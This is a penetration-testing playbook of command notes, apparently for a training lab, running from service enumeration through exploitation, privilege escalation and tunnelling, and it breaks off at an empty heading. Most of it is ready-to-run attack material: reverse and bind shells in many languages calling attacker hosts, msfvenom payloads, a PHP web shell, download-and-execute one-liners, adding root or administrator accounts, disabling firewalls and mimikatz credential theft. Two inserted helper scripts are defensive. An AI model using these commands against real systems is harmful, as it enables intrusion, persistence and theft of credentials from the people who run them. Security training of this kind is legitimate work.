
Penetration Test Playbook

Passive Information Gathering

Active Information Gathering

Network-wide Enumeration

What have we got from our network-wide enumeration (if applicable)?

cd network_enumeration
grep -H '<new victim IP or hostname or user>' *

Manually check for reverse lookups e.g. host <victim IP>

Other Boxes?

What have we got from breaking into other boxes on the network (if applicable)?

cd box_enumeration
grep -H '<new victim IP or hostname or user>' *

Automate it

sudo ~/Documents/tools/nmapAutomator/nmapAutomator.sh --type All --host <victim IP address>
cd 01_nmapautomator/<nmap OR recon>/
cat *
python3 ~/Documents/tools/AutoRecon/src/autorecon/autorecon.py <victim IP address>
cd 01_autorecon/scans/
cat *

Quick Nmap Scan

sudo nmap --top-ports 20 --open <victim IP>

Quick Nmap UDP Scan

sudo nmap -sU --top-ports 20 --open <victim IP>

Heavyish Nmap Scan

sudo nmap <victim IP> -p- -sT --reason
sudo nmap <victim IP> -p <ports you've found that are open> -sV --reason
sudo nmap -sS -sV -A -O -p <ports that you've found are open> <IP address>
sudo nmap -sS -sV -A -O -p- <IP address>

Other Nmap Scans

nmap -vv --reason -Pn -sV -sC --version-all -oN <output file> <victim IP>
nmap -vv --reason -Pn -A --osscan-guess --version-all -p- <victim IP>

Nmap NSE Scripts

Find some relevant NSE scripts with

ls -al /usr/share/nmap/scripts/ | grep <service>

then scan with

sudo nmap <victim IP> --script=<script found above>

also check for script arguments to run things properly:

for script in $(ls /usr/share/nmap/scripts/ | grep <service>); do nmap --script-help $script; done

53 DNS

Set up your machine for the environment:

sudo nmap -sS -sV -A -p 53 10.11.1.0/24 -oG 01_dns_enum.txt
grep -i open 01_dns_enum.txt | cut -d ' ' -f 2 > 01_dns_servers.txt

then edit /etc/resolv.conf to use them, e.g. add lines like the following: nameserver 10.11.1.20
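As an added example (not part of the original playbook), the shell helper below parses the -oG file the scan above writes and lists only hosts whose requested port is actually in state "open", then turns the 53/tcp hits into nameserver lines; it generalises the grep/cut step to any port. The scan output it runs on is constructed, not a real scan.

```sh
#!/bin/sh
# Added example: parse Nmap grepable (-oG) output and list hosts where a given
# port is in state "open". A plain grep for "open" also matches "open|filtered"
# rows in UDP scans; this version checks the state field of the requested port.

# Constructed sample of -oG output (not a real scan). Fields in a -oG host line
# are tab-separated and individual ports are separated by ", ".
sample_gnmap() {
  printf '%s\n' '# Nmap scan initiated as: nmap -sS -sV -p 53 -oG 01_dns_enum.txt 10.11.1.0/24'
  printf 'Host: %s (%s)\tPorts: %s\tIgnored State: closed (0)\n' \
    '10.11.1.20'  ''                     '53/open/tcp//domain//ISC BIND 9.11.3/' \
    '10.11.1.50'  ''                     '53/filtered/tcp//domain///' \
    '10.11.1.71'  ''                     '53/open|filtered/udp//domain///' \
    '10.11.1.220' 'dc01.thedomain.local' '53/open/tcp//domain//Microsoft DNS 6.1.7601/, 88/open/tcp//kerberos-sec///'
  printf '%s\n' '# Nmap done -- 256 IP addresses (4 hosts up) scanned in 30.00 seconds'
}

# open_hosts_for_port PORT < scan.gnmap
# Prints "ip port/proto service (product)" for every host with PORT open.
open_hosts_for_port() {
  awk -v want="$1" '
    /^Host: / && /Ports: / {
      ip = $2
      s = $0
      sub(/.*Ports: /, "", s)                 # keep only the port list
      sub(/[ \t]*Ignored State:.*/, "", s)    # drop the trailing summary field
      n = split(s, ports, /, /)
      for (i = 1; i <= n; i++) {
        # entry layout: port/state/proto/owner/service/rpcinfo/product/
        split(ports[i], f, "/")
        if (f[1] == want && f[2] == "open")
          printf "%s %s/%s %s%s\n", ip, f[1], f[3], f[5], (f[7] != "" ? " (" f[7] ")" : "")
      }
    }'
}

# dns_servers_from_gnmap < scan.gnmap
# Unique IPs with 53/tcp open, ready to be written as "nameserver" lines.
dns_servers_from_gnmap() {
  open_hosts_for_port 53 | awk '{ print $1 }' | sort -u
}

# Stand-alone usage on the constructed sample (replace with: < 01_dns_enum.txt).
sample_gnmap | open_hosts_for_port 53
sample_gnmap | dns_servers_from_gnmap | sed 's/^/nameserver /'
```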

Find DNS Servers

host -t mx google.com
host -t txt google.com
dnsenum google.com
dnsrecon -d google.com -t axfr

DNS Zone Transfer

host -l <domain name> <dns server address>

80, 8080 HTTP, 443 HTTPS, 8009 Apache Tomcat / Jserv

nmap -vv --reason -Pn -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" <victim IP>

If port 80 or 443 is open, visit it in a browser, run curl -i <victim IP> and curl -i -L <victim IP>, view the source, inspect elements, and look for elements supporting user interaction, cookies being set, URL manipulation and directory traversal.

curl <victim IP address>/robots.txt -s | html2text

View robots.txt as a Search Engine:

curl --user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html)" http://<victim IP address>/robots.txt

See AutoRecon and NmapAutomator output.

SSL Enumeration:

sslscan <victim IP>
curl -v '<url>'
curl -v '<url>' --insecure

Web Application Scanning:

gobuster dir -u <IP address> -w <wordlist>
dirb http://<domain or IP address> <wordlist>

Are there any other wordlists we should look at trying based on gobuster or dirb results?

ls -al /usr/share/wordlists/SecLists/Discovery/Web-Content/
ls -al /usr/share/wordlists/dirb/
dirb http://10.11.1.71 /usr/share/wordlists/SecLists/Discovery/Web-Content/CGIs.txt -N 302
gobuster dir -u <IP address> -w /usr/share/wordlists/SecLists/Discovery/Web-Content/IIS.fuzz.txt

Remember that gobuster doesn't search recursively but dirb does by default, so if you're not finding anything useful, kick off the slower one.

nikto -h <IP address>
wpscan --url <domain> --enumerate ap,at,cb,dbe
nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 <victim IP address>

22 SSH, 3389 RDP, 5900 VNC

ls -lh /usr/share/nmap/scripts/*<service>*
nmap 10.11.1.71 -p 22 -sV --script=ssh-hostkey
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <victim IP address>

Sometimes you need -Pn.

Attempt to connect to open ports using ssh, rdesktop, telnet, nc, ftp, smbclient, etc. Can you interact at all? Is authentication required? Is further version information (fingerprints, keys, domains, etc.) provided back? Is there a README.md or a robots.txt?

rdesktop -u <username> <victim IP address>

139 NetBios SSN, 445 SMB

sudo nmap -sV -sS -p 139,445 --script=smb-os-discovery <IP address>
sudo nmap -sV -sS -p 139,445 --script=smb-enum* <IP address>
sudo nmap -sV -sS -p 139,445 --script=smb-vuln* <IP address>
nmap --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -p445 <victim IP>
sudo nbtscan <IP address>
sudo enum4linux -a <IP address>
smbmap -H <victim IP>

Not getting the version out of Nmap? Set up Wireshark to capture a connection to a guest session, then inspect the packet called Session Setup AndX Response; it should contain a field called Native LAN Manager with a version number in it.

Or, if you still aren't getting a version, in one terminal run:

sudo ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]' port 139

and in a second window:

smbmap -H 10.11.1.115 -u '' -p '' -P 139

then go back to the first terminal to see what you're capturing; a version should pop out.

Log in to a SMB Server:

smbclient //<victim IP address>/<share name>
smbclient -L <name of server>

Logging in using Guest account:

smbclient //<victim IP address>/<share folder> -U" "%" "
smbclient //<victim IP address>/<share name> -U guest%
smbclient -L //<victim IP address>
smbmap -H <victim IP address> -u '' -p '' -P 139

Attempt to connect to open ports using ssh, rdesktop, telnet, nc, ftp, smbclient, etc. Can you interact at all? Is authentication required? Is further version information (fingerprints, keys, domains, etc.) provided back? Is there a README.md or a robots.txt?

Enumerate a DC: add a line to /etc/hosts resolving the IP to the domain name, then run Nmap scans against the domain name.

Enumerate Usernames of DC: make sure your domain is resolved nicely in /etc/hosts then run ./kerbrute userenum --dc thedomain.local -d thedomain.local <wordlist>

25 SMTP, 110 POP3, 995 POP3S, 143 IMAP, 993 IMAPS

sudo nmap <victim IP> -sV -p 25 --script smtp*
sudo nmap <victim IP> -sV -p 110 --script pop*

Attempt to connect to open ports using ssh, rdesktop, telnet, nc, ftp, smbclient, etc. Can you interact at all? Is authentication required? Is further version information (fingerprints, keys, domains, etc.) provided back? Is there a README.md or a robots.txt?

Enumerate users by connecting with telnet <victim IP> 25 and running VRFY <user> or EXPN <user>; test for mail, daemon, root, backup and other user names found through other enumeration techniques, or use nc with the -C option to fix line endings.

111 RPCBind, 135 MSRPC, 1025 MSRPC, 2049 NFS

sudo nmap -sV -p 111 --script=rpcinfo <IP address>
sudo nmap -sV -sS -p 111 --script nfs* <IP address>
sudo nmap -sV -p 135 --script=msrpc-enum <victim IP address>
rpcinfo -s <victim IP address>

Show mounting information for an NFS server: showmount -a <victim IP address>

Mount an NFS share on Kali: sudo mkdir /var/<share name>, then sudo mount -t nfs <victim IP address>:/<share name> /var/<share name>; verify it mounted successfully with mount or df -h

Unmount an NFS share on Kali with either umount <victim IP address>:/<share name> or umount /var/<share name>. If it won't detach because it's in use, run fuser -m MOUNT_POINT to see which processes are using it; if you still have trouble, umount -l MOUNT_POINT (--lazy) detaches a busy file system as soon as it's no longer busy.

Attempt to connect to open ports using ssh, rdesktop, telnet, nc, ftp, smbclient, etc. Can you interact at all? Is authentication required? Is further version information (fingerprints, keys, domains, etc.) provided back? Is there a README.md or a robots.txt?

21 FTP

sudo nmap -p 21 -sV --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-syst,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum <victim IP address>

If anonymous login is allowed: ftp <victim IP> with user anonymous and any password, and make sure to set the transfer mode with binary so any binary files you upload don't get mangled.

Common Useful Commands

help
pwd
ls
get <filename>
put <filename>

1433 MS-SQL, 3306 MySQL

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <victim IP address>

Attempt to connect to open ports using ssh, rdesktop, telnet, nc, ftp, smbclient, etc. Can you interact at all? Is authentication required? Is further version information (fingerprints, keys, domains, etc.) provided back? Is there a README.md or a robots.txt?

sqsh -S <victim IP address> -U sa -P <password>, then see the MS SQL xp_cmdshell card for setting it up if it isn't configured.

161 SNMP

sudo nmap -sU --open -p 161 <IP address>
onesixtyone -c community -i <IP address>
snmpwalk -c <public, private, manager> -v1 <IP address>

Attempt to connect to open ports using ssh, rdesktop, telnet, nc, ftp, smbclient, etc. Can you interact at all? Is authentication required? Is further version information (fingerprints, keys, domains, etc.) provided back? Is there a README.md or a robots.txt?

Exploitation

Using Public Exploits

Finish your enumeration above, write-up version numbers, be thorough

searchsploit <term> --exclude="(PoC)|/dos/"

Google all the versions and any CVE's etc. that came up during enumeration.

Have you found any named vulnerabilities or services you can search for Nmap scripts for, to confirm your victim is vulnerable? Are there any PoCs on the internet for those vulnerabilities to try?

Are there any Nmap scripts for named vulns you've found? ls -lah /usr/share/nmap/scripts/*<vuln name e.g. shellshock>*

Check how recent the public exploits are and pick the most recent one; if one depends on old libraries, see if you can port it to new ones.

Finding exploits - starting with services and applications running before moving on to operating system and kernel exploits - searchsploit <keywords> --exclude='/dos/', searchsploit -x <exploit code>

Prepare Virtual Environment for Exploitation:

python3 -m venv virtual-env-name
virtualenv -p /usr/bin/python2.7 virtual-env-name

Avoiding SSL and SelfSignedCerts in Python:

import requests
import urllib3
urllib3.disable_warnings()  # silence the InsecureRequestWarning that verify=False triggers
url = 'https://<victim IP address>/'
res = requests.get(url, allow_redirects=False, verify=False)  # verify=False skips certificate validation
print(res.status_code)

Compile Linux 32-bit Binary on 64-bit Kali:

gcc -m32 exploit.c -o exploit
gcc -Wl,--hash-style=both -m32 -Wall -o exploit exploit.c

Compile Linux 64-bit Binary on 64-bit Kali:

gcc exploit.c -o exploit

Compile Windows 32-bit Binary on 64-bit Kali:

i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32
i686-w64-mingw32-gcc exploit.c -o exploit.exe

Compile Windows 64-bit Binary on 64-bit Kali:

x86_64-w64-mingw32-gcc exploit.c -o exploit.exe

Web Application Attacks

Did you find any admin consoles? admin:<blank>, admin:admin, admin:password, root:<blank>, root:root, root:password, username:username, admin:adminadmin, any users/passwords from other boxes that might have been reused?

Generate a lil wordlist based on a login page you've got to: cewl http://<url of login page> -w wordlist.txt

Is the application open source and hosted in some repository? Can we find default credentials / locations sensitive information is stored / identifiers for sensitive information we could grep around for?

XSS: < > ' " { } ;

Directory Traversal: ../, ..\

File Inclusion: http://domain/page.php?file=<do some things>

SQL Injection: ', or 1=1;#, or 1=1 LIMIT 1;#

Reviewing and manipulating network traffic with BurpSuite, tcpdump, and Wireshark

Client-Side Attacks

Passive Information Gathering: Google, Shodan, social media and forums to find information about externally facing infrastructure, operating systems, browser types and versions, installed plugins, and User-Agent strings.

Active Information Gathering: social engineering, client fingerprinting.

Leveraging HTML Applications (.hta)

Exploiting Microsoft Office.

General Shells

ls -al /usr/share/webshells/

Test payloads:

whoami
echo $USER && cat /etc/issue
phpinfo()

Powercat Reverse:

# the shell
powercat -c <attacker IP> -p 443 -e cmd.exe

# catch with
sudo nc -lvp 443

Powercat Bind:

# the shell
powercat -l -p 443 -e cmd.exe

# connect to with
nc <victim IP> 443

Powercat - generate encoded reverse shell, then send to attacker machine from victim:

powercat -c <attacker IP> -p 443 -e cmd.exe -ge > encoded_reverseshell.ps1
powershell.exe -E <Base64 encoded string stored in encoded_reverseshell.ps1>

General Shell Non-staged:

msfvenom -p windows/shell_reverse_tcp LHOST=<attacker machine> LPORT=443 -f exe -o shell_reverse.exe

General Shell Staged:

msfvenom -p windows/shell/reverse_tcp LHOST=<attacker machine> LPORT=443 -f exe -o shell_reverse.exe

Apache Tomcat / Java Application:

msfvenom -p java/shell_reverse_tcp LHOST=<attacker machine> LPORT=4444 -f war -o shell.war

PHP:

<?php passthru($_GET['cmd']);?>
<?php $sock=fsockopen("<controller IP address>",1234);exec("/bin/sh -i <&3 >&3 2>&3");?>

Get Shells with PHP:

<?php system("wget <attacker IP address>/shell.txt -O /tmp/shell.php; php /tmp/shell.php"); ?>

Python Reverse:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker machine>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Linux Shells

Bash Reverse:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <listener IP> <listener port> >/tmp/f
/bin/bash -i >& /dev/tcp/<listener IP>/443 0>&1

Netcat Reverse (Linux Victim):

# the shell
nc -nv <attacker IP> 1234 -e /bin/bash

# catch with 
sudo nc -nvlp 1234

Netcat Bind (Linux Victim):

# the shell
nc -nvlp 4444 -e /bin/bash

# connect to with 
nc -nv <victim IP> 4444

Socat Bind (Linux Victim):

# the shell
socat -d -d TCP4-LISTEN:4443 EXEC:/bin/bash

# connect to with 
socat - TCP4:<remote IP address>:4443

Socat Reverse (Linux Victim):

# the shell
socat TCP4:<remote IP address>:443 EXEC:/bin/bash

# catch it with 
socat -d -d TCP4-LISTEN:443 STDOUT

Get a more stable TTY with Socat: listen with first command, then send shell with:

socat file:`tty`,echo=0,raw tcp-listen:4444
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<attacker IP address>:4444

Windows Shells

Running executables from Windows command prompt:

C:\Windows\System32\cmd.exe /c <enter executable / command here>
start <enter command / executable here>

Netcat Reverse (Windows Victim):

# the shell
ncat -nv <attacker IP> 4444 -e /mnt/c/Windows/system32/cmd.exe

# catch with 
sudo nc -nvlp 4444

Netcat Bind (Windows Victim):

# the shell
ncat -nvlp 4444 -e /mnt/c/Windows/system32/cmd.exe

# connect to with 
nc -nv <victim IP> 4444

Socat Reverse (Windows Victim):

# the shell
socat TCP4:<remote IP address>:443 EXEC:'cmd.exe',pipes

# catch it with 
socat -d -d TCP4-LISTEN:443 STDOUT

Socat Bind (Windows Victim):

# the shell
socat -d -d TCP4-LISTEN:4443 EXEC:'cmd.exe',pipes

# connect to with 
socat - TCP4:<remote IP address>:4443

PowerShell Reverse:

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<attacker machine>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();};$client.Close()"

PowerShell Bind:

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' +(pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"

PowerShell Using nishang:

powershell iex (New-Object Net.WebClient).DownloadString('http://<attacker IP>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <attacker IP> -Port 1337

Post-Exploitation

Transferring Files

Transferring files with socat:

# serve it up with 
sudo socat TCP4-LISTEN:443,fork file:some_file.txt

# download it with 
socat TCP:<remote IP address>:443 file:some_file.txt,create

Transferring files by serving them up over HTTP:

python2 -m SimpleHTTPServer 8888
python3 -m http.server 7331

then use wget, curl --output, or visit it in a browser on your victim; alternatively put your resource in /var/www/html, run sudo systemctl start apache2, then use wget on your victim.

Transferring files with nc to Linux host:

# on attacker machine
sudo nc -q 5 -nvlp 80 < <some script>.sh

# then on victim (bash is needed for the /dev/tcp pseudo-device)
bash -c 'cat < /dev/tcp/<attacker machine>/80' | sh

Execute from memory and send output back to the attacker:

nc -nvlp 9002 | tee output.out 

# then on victim 
curl <attacker machine>/<script to execute>.sh | sh | nc <attacker machine> 9002

Transferring files with SMB (note you have to serve these up as root on your machine, and use a Python virtual environment because you're going to need Python 2 and the Impacket library):

# on attacking machine: 
smbserver.py a /usr/share/windows-binaries/

# on victim machine: 
\\<attacker IP>\a\whoami.exe

Transferring files with ftp: ftp <victim IP>, then binary to set binary mode if you're transferring executables (in case the session is in ASCII mode and wrecks the file), then put <file name on attacker machine>. You can also use it to transfer files from the victim to the attacker machine if FTP is running there: ftp <attacker IP> with the user:password offsec:offsec.

Transferring Files with certutil:

certutil.exe -urlcache -split -f http://<attacker machine>/<file to transfer>

Checking file integrity after upload:

powershell Get-FileHash -Algorithm MD5 <file name>
md5sum <file name>

Download file to disk with PowerShell:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<attacker IP address>/wget.exe','C:\Users\offsec\Desktop\wget.exe')"

Run file in memory with PowerShell:

powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://<attacker IP address>/helloworld.ps1')

General Privilege Escalation

Non-interactive to Interactive:

python -c 'import pty; pty.spawn("/bin/bash")'

Enumeration and Finding Exploits - starting with services and applications running before moving on to operating system and kernel exploits:

searchsploit <keywords> --exclude='/dos/'
searchsploit -x <exploit code>

Own /bin/bash:

chmod +s /bin/bash
/bin/bash -p

UDF in MySQL: select do_system('cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash'); then from local shell run /tmp/rootbash -p

Enumerating Linux for Privilege Escalation

Is your shell interactive (su), what kind of shell is it (echo $SHELL), do you need to fix your PATH? Fix PATH if you need to:

export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
whereis perl
whereis python
whereis nc
whereis nmap

Utilise Nmap: sudo nmap --interactive, then !sh

cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
/tmp/rootbash -p

Automating Enumeration and Privilege Escalation: LinEnum, Linux Smart Enumeration lse.sh, unix-privesc-check

View real, effective, and saved user and group IDs:

id
cat /proc/$$/status | grep "[UG]id"

More info about the box:

hostname
cat /etc/issue
cat /etc/*-release
uname -a
uname -i
ip a
ifconfig
lsb_release -a

Running Processes:

ps axu
ps aux | grep "^root"
<program> --version
<program> -v
dpkg -l | grep <program>
rpm -qa | grep <program>

Can we use sudo?

sudo <program>
sudo -u <username> <program>
sudo -l
sudo -s
sudo -i
sudo /bin/bash
sudo passwd

Anything useful in GTFOBins? Any config files hanging around with passwords in em? Any SSH keys hanging around?

Current user information:

whoami
echo %username%
id
who
pwd
last
cat ~/<.bash_profile, .bashrc or .bash_logout>
cat /etc/<profile or bashrc>
env
set
cat ~/.*history | less

Is /etc/shadow readable?

head -n 1 /etc/shadow
echo '<hash from above command>' > hash.txt
john --format=sha512crypt --wordlist=rockyou.txt hash.txt

Is /etc/shadow modifiable?

cat /etc/shadow > etc_shadow_backup.txt
mkpasswd -m sha-512 newpassword
vim /etc/shadow

Is /etc/passwd modifiable? Make a new root user if you find you can write to /etc/passwd:

# generate password hash with
openssl passwd evil

# then append the entry (name:hash:uid:gid:gecos:home:shell)
echo "root2:<generated openssl hash>:0:0:root:/root:/bin/bash" >> /etc/passwd

# then log in with
su root2
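A defender-side counterpart, added here as an example and not part of the original playbook: the technique above leaves an /etc/passwd entry with a second UID 0 and a hash stored directly in the password field, and the short audit below flags both (plus empty password fields and malformed lines). The passwd content it runs on is constructed, and the root2 hash is a placeholder, not a real hash.

```sh
#!/bin/sh
# Added example: audit passwd(5) entries for the artefacts the append-to-/etc/passwd
# technique leaves behind: an extra UID 0 account, a password field that is not the
# "x" shadow marker, an empty password field, or a line with the wrong field count.

# Constructed /etc/passwd content (not from a real host). The "root2" line stands
# for what the echo >> /etc/passwd step above produces; its hash is a placeholder.
sample_passwd() {
  printf '%s\n' \
    'root:x:0:0:root:/root:/bin/bash' \
    'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin' \
    'backup:x:34:34:backup:/var/backups:/usr/sbin/nologin' \
    'offsec:x:1000:1000:offsec,,,:/home/offsec:/bin/bash' \
    'root2:$1$CONSTRUCT$placeholderhashvalue:0:0:root:/root:/bin/bash' \
    'svc::1001:1001::/home/svc:/bin/sh'
}

# audit_passwd < /etc/passwd
# Prints one "FINDING account" line per issue; prints nothing for a clean file.
audit_passwd() {
  awk -F: '
    NF != 7                 { printf "MALFORMED %s (%d fields)\n", $1, NF; next }
    $3 == 0 && $1 != "root" { printf "EXTRA_UID0 %s\n", $1 }
    $2 == ""                { printf "EMPTY_PASSWORD %s\n", $1 }
    $2 != "" && $2 != "x"   { printf "NON_SHADOW_PASSWORD %s\n", $1 }
  '
}

# Stand-alone usage on the constructed sample (replace with: < /etc/passwd).
sample_passwd | audit_passwd
```

On a live host, run the same check against a known-good copy of /etc/passwd and diff the two outputs to separate pre-existing oddities from fresh changes.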

Looking for readable backup files:

ls -al /
ls -al /home/user
ls -al /tmp
ls -al /var/backups

Found a readable private SSH key? Download root_key to local machine then:

chmod 600 root_key
ssh -i root_key root@<victim machine>

Find SUID Binaries:

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null

# find SUID and SGID 
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

Find all writeable files in /etc:

find /etc -maxdepth 1 -writable -type f 2> /dev/null

Find all readable files in /etc:

find /etc -maxdepth 1 -readable -type f 2> /dev/null

Find Writeable Files:

find / -writable ! -user <whoami> -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
find / -perm -2 -type f 2>/dev/null
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null

Find all directories which can be written to: find / -executable -writable -type d 2> /dev/null

Files Edited in Last 10 Minutes:

find / -mmin -10 2>/dev/null | grep -Ev "^/proc"

Who else uses the box:

cat /etc/passwd
cat /etc/sudoers
sudo -l
grep -vE "nologin|false" /etc/passwd
grep -v '^#' /etc/ssh/sshd_config | uniq

Connectivity info, compare to port scan to see what's allowed through the firewall:

/sbin/route
netstat -atulpn
ss -anp
/etc/iptables
arp -e
chkconfig --list
grep 80 /etc/services

Environment variables - is LD_PRELOAD or LD_LIBRARY_PATH available in the PATH? Can we mess with what's in the PATH using cron jobs?

Finding programs that try to execute other programs:

strings /path/to/file
strace -v -f -e execve <command> 2>&1 | grep exec
ltrace <command>

Investigate scheduled jobs:

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny*
cat /etc/services
for dir in $(ls /etc/ | grep cron); do ls -al /etc/$dir; done

NFS:

# on target
cat /etc/exports
showmount -e 192.168.1.25

# locally on kali as root
mkdir /tmp/nfs
mount -o rw,vers=2 192.168.1.25:/tmp /tmp/nfs
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod +xs /tmp/nfs/shell.elf

# and finally on target
/tmp/shell.elf

What's installed:

dpkg -l
rpm -qa
lsmod
/sbin/modinfo <module>
ls -alh /usr/bin/
ls -alh /sbin/

Investigate services:

cat /etc/fstab | grep <service name>
service --status-all
ls /etc/init.d

What's in the web root?

Debian - /etc/apache2/

CentOS - /etc/httpd/

If only the config lives at the paths above, find the document root with grep -Ri DocumentRoot; it's often /var/www/html/

Are any services misconfigured or running vulnerable plugins? cat /etc/*.conf; where can we write things? find / -writable -type d 2>/dev/null

Passwords in memory: strings /dev/mem -n10 | grep -i PASS

Enumerating Windows for Privilege Escalation

Is your shell interactive, what kind of shell is it, do you need to fix your PATH, what tools are installed and available to you?

Automating Enumeration and Privilege Escalation: LovelyPotato, windows-privesc-check, JAWS, windows-exploit-suggester, Sherlock.ps1, Watson, Windows Exploit Suggester Script

type
dir
del
net user test 1234 /add
net localgroup administrators test /add
cacls *.* /t /e /g domainname\administrator:f
netsh firewall set opmode disable
where perl
where python
where ncat
powershell $PSVersionTable

Current user information:

whoami
whoami /priv
whoami /groups
net user
net user <username>
net user <username> /domain
net accounts

More info about the box:

hostname
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
mountvol
wmic qfe get Caption, Description, HotFixID, InstalledOn
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
net share

Connectivity info - make sure to compare this to what you already know, are there more ports here that you couldn't see with your earlier scans:

ipconfig /all
route print
netstat -ano
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all

Default Writeable Folders:

C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing

Where is the web root? Windows IIS - C:\inetpub\wwwroot\

Finding Unquoted Paths:

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

Processes running - tasklist /SVC

Regular jobs running:

schtasks /query /fo LIST /v
schtasks /query /fo LIST 2>nul | findstr TaskName

Check for Exploitable Services, using an old version of accesschk.exe to avoid the GUI prompt when running it:

.\accesschk.exe /accepteula -uwcqv "Authenticated Users" *
.\accesschk.exe /accepteula -ucqv <service name identified from first command>

What's installed:

wmic product get name, version, vendor
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}
driverquery.exe /fo table

Where can we write things:

accesschk.exe -uws "Everyone" "C:\Program Files"
powershell Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

Enumerating Active Directory: net user and PowerShell

Enable RDP:

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

Has Windows Auto-login Password been set? reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Active Directory Authentication Attacks: mimikatz.exe (privilege::debug, token::elevate, sekurlsa::logonpasswords, sekurlsa::tickets, kerberos::list /export), klist, Invoke-Kerberoast.ps1, GetUserSPNs.ps1, Spray-Passwords.ps1, Pass the Hash, Overpass the Hash, Pass the Ticket, Generating Golden Tickets, Domain Controller Synchronisation

Port Forwarding and Tunneling

General Port Forwarding (Linux):

internet-connected victim facilitating attacker machine connecting to non-internet-connected victim - in /etc/rinetd.conf:

<internet-connected victim> 80 <non-internet-connected victim> 80
sudo service rinetd restart
ss -antp | grep "80"

so all traffic sent on port 80 to the internet-connected victim will be sent to the non-internet-connected victim.

General Remote Port Forwarding (Windows):

internet-connected victim facilitating attacker machine connecting to non-internet-connected victim - from our reverse shell, so running on the internet-connected victim to access a port not available through the firewall:

cmd.exe /c echo y | plink.exe -ssh -l kali -pw ilak -R <attacker>:1234:<internet-connected victim>:3306 <attacker>

we can now scan a port that was previously unavailable to us:

sudo nmap -sT -sV 127.0.0.1 -p 1234

General Local Port Forwarding (Windows):

internet-connected victim facilitating attacker machine connecting to non-internet-connected victim - on the internet-connected victim:

plink.exe -N -L <internet-connected victim machine>:4444:<attacker machine>:443 kali@<attacker machine>

on the attacker machine: make sure PermitRootLogin is set to yes in /etc/ssh/sshd_config on your attacker machine first and restart the SSH service with sudo service ssh restart, then connect on your attacker machine to 127.0.0.1:443

SSH Local Port Forwarding:

